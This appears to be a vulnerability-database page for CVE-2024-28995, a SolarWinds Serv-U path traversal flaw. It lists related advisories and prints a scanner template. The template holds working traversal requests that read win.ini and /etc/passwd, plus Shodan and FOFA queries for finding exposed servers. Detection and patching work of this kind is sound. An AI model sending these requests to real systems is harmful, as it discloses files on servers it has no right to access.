| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
| Exploit for Path Traversal in Solarwinds Serv-U | 14 Jun 202423:05 | – | githubexploit | |
| Exploit for Path Traversal in Solarwinds Serv-U | 26 Jun 202410:51 | – | githubexploit | |
| Exploit for Path Traversal in Solarwinds Serv-U | 1 Jul 202411:49 | – | githubexploit | |
| Exploit for Path Traversal in Solarwinds Serv-U | 14 Jun 202408:04 | – | githubexploit | |
| Exploit for Path Traversal in Solarwinds Serv-U | 14 Jun 202408:01 | – | githubexploit | |
| CVE-2024-28995 | 6 Jun 202400:00 | – | attackerkb | |
| The vulnerability of the SolarWinds Serv-U File Server file server arises from incorrect path restrictions for the restricted access directory, allowing attackers to gain read access to files on the server. | 18 Jun 202400:00 | – | bdu_fstec | |
| CVE-2024-28995 | 14 Jun 202404:14 | – | circl | |
| SolarWinds Serv-U Path Traversal Vulnerability | 17 Jul 202400:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 17 Jul 202412:00 | – | cisa |
id: CVE-2024-28995
info:
name: SolarWinds Serv-U - Directory Traversal
author: DhiyaneshDK
severity: high
description: |
SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
impact: |
Attackers can traverse directories and access sensitive files outside the intended directory structure.
remediation: |
Update SolarWinds Serv-U to a version that patches the directory traversal vulnerability.
reference:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995
- https://x.com/stephenfewer/status/1801191416741130575
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-28995
cwe-id: CWE-22
epss-score: 0.99614
epss-percentile: 0.99944
cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: solarwinds
product: serv-u
shodan-query: html:"Serv-U"
fofa-query: server="Serv-U"
tags: cve,cve2024,lfi,solarwinds,serv-u,kev,vkev,vuln
http:
- raw:
- |
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: {{Hostname}}
- |
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: dsl
dsl:
- 'contains(header, "Serv-U")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b0ceb6ede8c54df8501d24c64f0e4cf591da71d34236048bb9d3c51dbc6ca05a022008bd993746d3f5706456d3ae177b54c3ef7ba309fc96fd4bfd125aa8eaa14e15:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation